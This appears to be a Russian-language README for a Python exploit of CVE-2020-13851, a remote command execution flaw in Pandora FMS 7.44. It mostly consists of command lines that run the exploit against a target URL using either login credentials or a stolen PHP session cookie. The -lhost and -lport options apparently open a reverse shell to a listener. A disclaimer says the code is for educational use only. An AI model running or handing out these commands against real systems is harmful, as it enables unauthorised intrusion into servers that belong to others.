
CVE-2020-13851 Pandora FMS 7.44
Pandora FMS 7.44 CVE-2020-13851 RCE позволяет аутентифицированному пользователю выполнить удалённые команды через функцию событий. Это можно сделать с помощью учётных данных или PHP-сессии (cookie).
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
Для меню справки
python3 pandorafms_7.44.py -h
Весь код, представленный в этом репозитории, предназначен только для образовательных/исследовательских целей. Любые действия и/или активности, связанные с материалом, содержащимся в этом репозитории, являются исключительно вашей ответственностью. Неправильное использование кода из этого репозитория может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Автор не будет нести ответственности в случае предъявления уголовных обвинений лицам, использующим код из этого репозитория с нарушением закона.